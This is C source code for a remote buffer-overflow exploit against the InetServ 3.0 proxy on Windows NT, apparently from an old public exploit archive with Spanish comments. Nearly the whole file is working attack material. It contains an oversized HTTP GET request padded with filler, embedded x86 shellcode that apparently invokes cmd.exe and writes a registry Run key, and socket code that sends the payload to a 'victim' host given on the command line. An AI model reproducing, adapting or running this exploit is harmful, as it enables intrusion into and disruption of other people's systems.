/********************************************************************** InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^ *********************************************************************** CLASE: DENIAL OF SERVICE BUG/SHELLCODE FOUND by: Greg Hoglund ))))))))))))(((((((((((( )))RaZa MeXiCaNa TeAm((( ))))))))))))(((((((((((( w w w . r a z a - m e x i c a n a . o r g (((((((((((((((((((((((((((((((((((((((((( ************************************************************************ Aclaracion: el exploit lo programe porque lo necesitaba usar bajo Unix y no en entorno Windows como fue presentado. ************************************************************************/ /*********************************************************************** -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkMFKw0AQhtXjPsX3AimIN9HDkm5pIIkSg8QeKmt3lUWThbVilb6S7+iYkz0J km/4D//MwAz/18nFw/HpkcAvMuHyT362FIc0aFYiqDB0FOTi6rFDKy1Npf55StW2 9+e4dP/owuvzGqWyKVF5jMmFwbqYcP6F6xQ//GYbKcPwtsN32+R7rxq7slS+C7mt La3XPbyPNSNh+RRl9Hh2BDbiBtGMKNOnCV4+zHx+dluUXC1ol4batOzl+H50i6LW JXN9R3HD0jRm2rwk/28= =92LB -----END PGP MESSAGE----- ************************************************************************/ /*------------------------------* * DEFINIR EL PUERTO DEFAULT */ /*------------------------------*/ #define PUERTO 224 #include #include #include #include /*------------------------------* * COLORES DEFINIDOS[2000]*/ /*------------------------------*/ #define NORMAL "\E[m" #define VERDE "\E[32m" #define BRILLOSO "\E[1m" #define ROJO "\E[31m" #define CELESTE "\E[36m" #define AZUL "\E[34m" char shellcode[] = "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \ "\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \ "\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \ "\x53\xB8\x48\x77\x78\x77\xBA\x77\x77\x77\x77" \ "\x33\xC2\x50\x33\xC0\x50\xB8\xAE\x9B\x65\x77\x33\xC2\x50" "\xB8\x75\x77\x77\xF7\x33\xC2\x50\xB8\x7B\xA7\x34\x77" \ "\x33\xC2\xFF\x10\x8B\xFB\xBA\x77\x77\x77\x77" \ "\xB8\x63\x9A\x65\x77\x33\xC2\x2B\xD8\x53\x50" \ "\x6A\x01\x33\xC9\x51\xB8\x70\x9A\x65\x77" \ "\x33\xC2\x50\xFF\x37\xB8\x77\xA7\x34" \ "\x77\x33\xC2\xFF\x10\xCC"\ "AAAAAAAAAAAAAAA" \ "\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \ "\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \ "\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \ "\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \ "\xD2\xF5\xEE\x80" \ "\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \ "\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80"; void victima(char *conn22); int conexion; void victima(char *conn22) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(conn22); if (hp==NULL) { printf("%s%sEl host %s no existe!!!!\n",ROJO,BRILLOSO,conn22); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(PUERTO); conexion = socket(AF_INET, SOCK_STREAM, 0); connect(conexion,(struct sockaddr *) &sin, sizeof(sin)); } void main(int argc, char **argv) { char buffer[1500]; int a; char salida[50]; if (argc != 2) { system("clear"); printf("\n\n\n\n"); printf("%s%s InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^\n",VERDE,BRILLOSO); printf("%s----------------------------------------------------------------------\n\n",CELESTE); printf ("%s RaZa MeXiCaNa TeAm %swww.raza-mexicana.org\n\n",ROJO,CELESTE); printf ("-------===============================-------\n\n\n"); printf("Uso: %s%s \n\n",AZUL,argv[0]); exit(0); } printf("%s%sVictima: %s \n"NORMAL,ROJO,BRILLOSO,argv[1]); printf("%s----------------------------------------------------"NORMAL,AZUL); victima(argv[1]); sprintf(buffer,"%s",shellcode); send(conexion, buffer, strlen(buffer), 0); printf("%s%s%sTHE END\n\n",NORMAL,VERDE,BRILLOSO); } /*********************************THE END************************************/ /* www.hack.co.za [25 Feb 2000]*/